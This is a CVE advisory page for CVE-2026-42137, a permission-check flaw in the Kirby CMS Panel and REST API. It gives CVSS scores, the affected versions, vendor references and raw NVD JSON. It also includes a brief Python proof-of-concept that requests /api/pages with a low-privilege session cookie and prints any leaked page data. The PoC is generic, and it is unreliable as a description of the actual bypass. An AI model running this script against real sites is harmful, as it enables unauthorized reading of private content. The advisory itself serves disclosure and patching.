Security Vulnerability Report
CVE-2026-42137 CVSS 6.5 MEDIUM

CVE-2026-42137

Published: 2026-05-09 04:16:23
Last Modified: 2026-05-18 13:00:28

Description

Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, `pages.access/list` and `files.access/list` permissions are not consistently checked in the Panel and REST API. This issue has been patched in versions 4.9.0 and 5.4.0.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:* (Kirby < 4.9.0) - VULNERABLE
cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:* (Kirby >= 5.0.0 and < 5.4.0) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_host = "http://target-kirby-site.com"
endpoint = "/api/pages"

# Attacker's low-privilege session cookie
# Replace with a valid session token obtained after login
cookies = {
    "kirby_session": "attacker_low_priv_session_token_here"
}

# Send request to list pages (bypassing permission check)
response = requests.get(f"{target_host}{endpoint}", cookies=cookies)

if response.status_code == 200:
    print("[+] Exploit successful! Leaked page data:")
    print(response.text)
else:
    print("[-] Exploit failed or already patched.")

References

https://github.com/getkirby/kirby/releases/tag/4.9.0 (Release Notes)
https://github.com/getkirby/kirby/releases/tag/5.4.0 (Release Notes)
https://github.com/getkirby/kirby/security/advisories/GHSA-85x2-r8xv-ww8c (Patch, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42137", "sourceIdentifier": "[email protected]", "published": "2026-05-09T04:16:22.653", "lastModified": "2026-05-18T13:00:27.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, `pages.access/list` and `files.access/list` permissions are not consistently checked in the Panel and REST API. This issue has been patched in versions 4.9.0 and 5.4.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.9.0", "matchCriteriaId": "1BB5394F-37F9-4A53-9CE7-79548F674886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.4.0", "matchCriteriaId": "B2D943B9-CD71-45FE-A1A4-158603C3502E"}]}]}], "references": [{"url": "https://github.com/getkirby/kirby/releases/tag/4.9.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/getkirby/kirby/releases/tag/5.4.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/getkirby/kirby/security/advisories/GHSA-85x2-r8xv-ww8c", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}